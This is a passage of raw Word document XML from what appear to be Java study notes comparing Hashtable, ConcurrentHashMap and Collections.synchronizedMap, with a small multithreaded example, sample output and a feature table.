        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Considered legacy, replaced by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xml:space="preserve"> in multi-threaded contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E077818"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronized Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Entire map is locked during read/write operations, which reduces concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F971BF0"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pict w14:anchorId="0BCD9CEE">
          <v:rect id="_x0000_i4017" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317C3B1"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10. Why Use ConcurrentHashMap Instead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB40BC"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ConcurrentHashMap uses </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lock striping</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing better concurrency by locking only parts of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AF213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Ideal for high-concurrency scenarios where frequent updates and reads occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04995E26"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t xml:space="preserve">Unlike Hashtable, </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reads are usually non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABD8943"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pict w14:anchorId="6A0A0224">
          <v:rect id="_x0000_i4018" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24477E52" w14:textId="77777777" w:rsidR="002F6848" w:rsidRPr="002F6848" w:rsidRDefault="002F6848" w:rsidP="002F6848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C5E55B" w14:textId="77777777" w:rsidR="002F6848" w:rsidRPr="002F6848" w:rsidRDefault="002F6848" w:rsidP="002F6848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Hashtable is useful when you need a </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe, legacy-compatible map</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null keys/values</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not required. For modern multi-threaded applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a better choice due to improved performance and finer-grained locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDDCC01" w14:textId="1D3B49AF" w:rsidR="000B6684" w:rsidRDefault="000B6684"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CEF35E">
          <v:rect id="_x0000_i3924" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="117DFB06" w14:textId="428D6479" w:rsidR="00541996" w:rsidRPr="00CE4B95" w:rsidRDefault="000263C2" w:rsidP="00541996">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Toc197867394"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidRPr="000263C2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SynchronizedHashMap</w:t>
      </w:r>
      <w:r w:rsidR="00541996" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w14:paraId="1B43E9C3" w14:textId="2AC4A939" w:rsidR="00741CCB" w:rsidRPr="00741CCB" w:rsidRDefault="00741CCB" w:rsidP="00034871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SynchronizedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a thread-safe version of </w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It ensures that only one thread can access or modify the map at any given time, thus preventing data inconsistency in multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176BA2C7"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pict w14:anchorId="10B642A6">
          <v:rect id="_x0000_i6533" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="175063F8"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1. How to Create a SynchronizedHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0217D30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nlike Hashtable, which is inherently synchronized, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SynchronizedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is created by wrapping a regular HashMap using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Collections.synchronizedMap()</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6706596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tax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A18DC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ap&lt;K, V&gt; syncMap = Collections.synchronizedMap(new HashMap&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C9F53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pict w14:anchorId="3B278683">
          <v:rect id="_x0000_i6534" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD06597"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2. Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D6374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import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14A971" w14:textId="77777777" w:rsidR="00741CCB" w:rsidRPr="00741CCB" w:rsidRDefault="00741CCB" w:rsidP="00741CCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB5226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public class SynchronizedHashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF6894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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFD9F9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Creating a Synchronized HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1520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Map&lt;String, Integer&gt; syncMap = Collections.synchronizedMap(new HashMap&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14CA62" w14:textId="77777777" w:rsidR="00741CCB" w:rsidRPr="00741CCB" w:rsidRDefault="00741CCB" w:rsidP="00741CCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA4E467"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Adding key-value pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DAEBE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Apple", 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7797F3D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Banana", 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B73A9C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Cherry", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F43E86B" w14:textId="77777777" w:rsidR="00741CCB" w:rsidRPr="00741CCB" w:rsidRDefault="00741CCB" w:rsidP="00741CCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B38172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Accessing elements (Synchronized block for iteration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD1B8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hronized (syncMap) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A767E4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for (Map.Entry&lt;String, Integer&gt; entry : syncMap.entrySet()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED87C3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stem.out.println(entry.getKey() + " -&gt; " + entry.getValue());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0222D3F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0D2AF11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436EEB73" w14:textId="77777777" w:rsidR="00741CCB" w:rsidRPr="00741CCB" w:rsidRDefault="00741CCB" w:rsidP="00741CCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114B762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 Multi-threaded example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1701A45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Runnable task = () -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350A91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put("Mango", 40);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717A953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stem.out.println("Updated by: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB07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50195730" w14:textId="77777777" w:rsidR="00741CCB" w:rsidRPr="00741CCB" w:rsidRDefault="00741CCB" w:rsidP="00741CCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77329DC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new Thread(task).start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCF21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new Thread(task).start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163FC80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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA6C0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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673ED8B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pict w14:anchorId="76602FDF">
          <v:rect id="_x0000_i6535" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="710D3A6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3. Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23864B4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Apple -&gt; 10  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203805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Banana -&gt; 20  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5F92B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Cherry -&gt; 30  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8CACA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pdated by: Thread-0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC78C2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pdated by: Thread-1  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6157C0B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pict w14:anchorId="63196782">
          <v:rect id="_x0000_i6536" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8896D3"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4.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5041"/>
      </w:tblGrid>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="3DD3FD3A" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="590F09E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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30FB901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SynchronizedHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="21960F29" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A6745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Thread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74CAC28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by synchronizing methods)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="2E9E5B0B" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14D0687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lastRenderedPageBreak/>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A439B0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oderate, due to synchronized access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="2E1AE7A7" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C177B2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ull Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BDB7B6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Allows null keys and values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="43027082" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5935D09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mplementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0090831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raps a HashMap using Collections.synchronizedMap()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="06DA6636" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FA312E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chronization Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E1A026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Entire map (global lock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="599532E4" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="038FDBB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terating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40ECDAD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ust be synchronized externally</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BCE302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pict w14:anchorId="60A4DCD6">
          <v:rect id="_x0000_i6537" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="401AA535"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5. Internal Working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5940B5F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Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword on methods to ensure that only one thread can access the map at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229100F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ynchronization Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE008AF" w14:textId="77777777" w:rsidR="00741CCB" w:rsidRPr="00741CCB" w:rsidRDefault="00741CCB" w:rsidP="00741CCB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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ocks the entire map for read/write operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B9F771" w14:textId="77777777" w:rsidR="00741CCB" w:rsidRPr="00741CCB" w:rsidRDefault="00741CCB" w:rsidP="00741CCB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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External Synchronization Required:</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> During iteration, explicitly synchronize using the map object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39568A09"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Example: Iteration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FA48E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ynchronized (syncMap) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CB59E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 xml:space="preserve">    syncMap.forEach((key, value) -&gt; System.out.println(key + ": " + value));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F459FA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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0BB41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pict w14:anchorId="2FB8EC30">
          <v:rect id="_x0000_i6538" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508ED7D"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6. Performance Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B960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lower than HashMap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Due to global locking during each operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300828B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Single Locking Point:</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
